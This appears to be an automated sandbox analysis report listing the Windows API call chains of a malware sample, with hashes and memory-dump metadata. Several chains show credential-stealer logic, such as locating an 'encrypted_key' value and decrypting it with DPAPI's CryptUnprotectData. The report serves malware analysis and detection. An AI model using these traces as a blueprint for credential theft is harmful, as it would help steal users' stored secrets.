                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                  • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                    • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                    • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                    • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                    • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                  • String ID: $"encrypted_key":"$DPAPI
                                                  • API String ID: 3731072634-738592651
                                                  • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                  • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                                  • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                  • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CodeInfoPageValidmemset
                                                  • String ID:
                                                  • API String ID: 703783727-0
                                                  • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                  • Instruction ID: 411a268c5bda43b313181ea0141e543248734a02c545bd386f71ff57211387d5
                                                  • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                  • Instruction Fuzzy Hash: 2031F830A042A59ED7259FB4CC952B9BFE0DB06310F3841FAE881EF192C738D809D761
                                                  APIs
                                                  • GetSystemTime.KERNEL32(?), ref: 00B36BD3
                                                  • sscanf.NTDLL ref: 00B36C00
                                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B36C19
                                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B36C27
                                                  • ExitProcess.KERNEL32 ref: 00B36C41
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Time$System$File$ExitProcesssscanf
                                                  • String ID:
                                                  • API String ID: 2533653975-0
                                                  • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                  • Instruction ID: 7206272370c2f970c20583bd4ae74c7a979d349ceb4ac5e6dbc4f41b0a7d7a73
                                                  • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                  • Instruction Fuzzy Hash: 4121E7B6D04208ABCF08EFE4D949AEEB7F6FF48300F14956EE406A3250EB345604CB65
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                                  • wsprintfA.USER32 ref: 00418850
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocProcesslstrcpywsprintf
                                                  • String ID: F(t$%dx%d
                                                  • API String ID: 2716131235-3934083006
                                                  • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                  • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                                  • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                  • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                                  • RegOpenKeyExA.ADVAPI32(80000002,00837B38,00000000,00020119,?), ref: 00417E5E
                                                  • RegQueryValueExA.ADVAPI32(?,0086AE38,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                                  • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3466090806-0
                                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                  • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                  • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B3809E
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B380A5
                                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 00B380C5
                                                  • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 00B380E6
                                                  • RegCloseKey.ADVAPI32(?), ref: 00B380F9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3225020163-0
                                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                  • Instruction ID: c039a328161d870b130696709a3c52fdd7c3a9074821852c381e5d94d20fadd4
                                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                  • Instruction Fuzzy Hash: 1E114FB5A84209FFD714CFD4DD4AFBBB7B9EB09710F104159F615A7280CB7558018BA2
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B3799B
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B379A2
                                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00B37920), ref: 00B379C2
                                                  • RegQueryValueExA.ADVAPI32(00B37920,00420AAC,00000000,00000000,?,000000FF), ref: 00B379E1
                                                  • RegCloseKey.ADVAPI32(00B37920), ref: 00B379EB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3225020163-0
                                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                  • Instruction ID: 872055278fb266b8c97bbe3fdef9ba263c3d36a0c6c4f07e8214d70ae15b883b
                                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                  • Instruction Fuzzy Hash: 3601F4B9A80308BFEB10DFE4DC4AFAEB7B9EB44701F104559FA05A7281DA7555008F51
                                                  APIs
                                                  • StrStrA.SHLWAPI(0086A8F0,?,?,?,0041140C,?,0086A8F0,00000000), ref: 0041926C
                                                  • lstrcpyn.KERNEL32(0064AB88,0086A8F0,0086A8F0,?,0041140C,?,0086A8F0), ref: 00419290
                                                  • lstrlenA.KERNEL32(?,?,0041140C,?,0086A8F0), ref: 004192A7
                                                  • wsprintfA.USER32 ref: 004192C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpynlstrlenwsprintf
                                                  • String ID: %s%s
                                                  • API String ID: 1206339513-3252725368
                                                  • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                  • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                                  • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                  • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                  • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                  • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3466090806-0
                                                  • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                  • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                                  • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                  • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B2151B
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B21522
                                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B2153E
                                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B2155C
                                                  • RegCloseKey.ADVAPI32(?), ref: 00B21566
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3225020163-0
                                                  • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                  • Instruction ID: 2f0465d66c1b8ad4530310e1796bdf42085243a7e50401e41db3efdccfba8c5f
                                                  • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                  • Instruction Fuzzy Hash: 5C0131BDA40208BFDB10DFE4DC49FAEB7BDEB48701F008199FA0597280D6749A018F91
                                                  APIs
                                                  • __getptd.LIBCMT ref: 0041C74E
                                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                  • __getptd.LIBCMT ref: 0041C765
                                                  • __amsg_exit.LIBCMT ref: 0041C773
                                                  • __lock.LIBCMT ref: 0041C783
                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                  • String ID:
                                                  • API String ID: 938513278-0
                                                  • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                  • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                                  • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                  • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                                  APIs
                                                  • __getptd.LIBCMT ref: 00B3C9B5
                                                    • Part of subcall function 00B3C206: __getptd_noexit.LIBCMT ref: 00B3C209
                                                    • Part of subcall function 00B3C206: __amsg_exit.LIBCMT ref: 00B3C216
                                                  • __getptd.LIBCMT ref: 00B3C9CC
                                                  • __amsg_exit.LIBCMT ref: 00B3C9DA
                                                  • __lock.LIBCMT ref: 00B3C9EA
                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00B3C9FE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                  • String ID:
                                                  • API String ID: 938513278-0
                                                  • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                  • Instruction ID: 0b17c3f5730a5627eb416781a01212bc1913511647e6c7dfabb01a5e279a3f04
                                                  • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                  • Instruction Fuzzy Hash: C2F09032A407149BD722BBFC5807B1E3BE0AF00724F3203CAF514B61D2DB245940DB9A
                                                  APIs
                                                  • StrCmpCA.SHLWAPI(00000000,00866FF0), ref: 0041079A
                                                  • StrCmpCA.SHLWAPI(00000000,00867010), ref: 00410866
                                                  • StrCmpCA.SHLWAPI(00000000,00867020), ref: 0041099D
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy
                                                  • String ID: `_A
                                                  • API String ID: 3722407311-2339250863
                                                  • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                  • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                                  • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                  • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                                  APIs
                                                  • StrCmpCA.SHLWAPI(00000000,00866FF0), ref: 0041079A
                                                  • StrCmpCA.SHLWAPI(00000000,00867010), ref: 00410866
                                                  • StrCmpCA.SHLWAPI(00000000,00867020), ref: 0041099D
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy
                                                  • String ID: `_A
                                                  • API String ID: 3722407311-2339250863
                                                  • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                  • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                                  • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                  • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                                  • ExitProcess.KERNEL32 ref: 00416755
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                  • String ID: <
                                                  • API String ID: 1148417306-4251816714
                                                  • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                  • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                                  • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                  • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00B368CA
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00B3698D
                                                  • ExitProcess.KERNEL32 ref: 00B369BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                  • String ID: <
                                                  • API String ID: 1148417306-4251816714
                                                  • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                  • Instruction ID: 4e19ed3b2bb0f1544fc3e0d009e20f44e958d59090a3ea1ba0912b662e1c10bb
                                                  • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                  • Instruction Fuzzy Hash: 85316DB1901208ABDB14EB90DD86FDEB7B8AF04300FA051C9F24576191EF746B88CF5A
                                                  APIs
                                                  • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID: @Jn@$Jn@$Jn@
                                                  • API String ID: 544645111-1180188686
                                                  • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                  • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
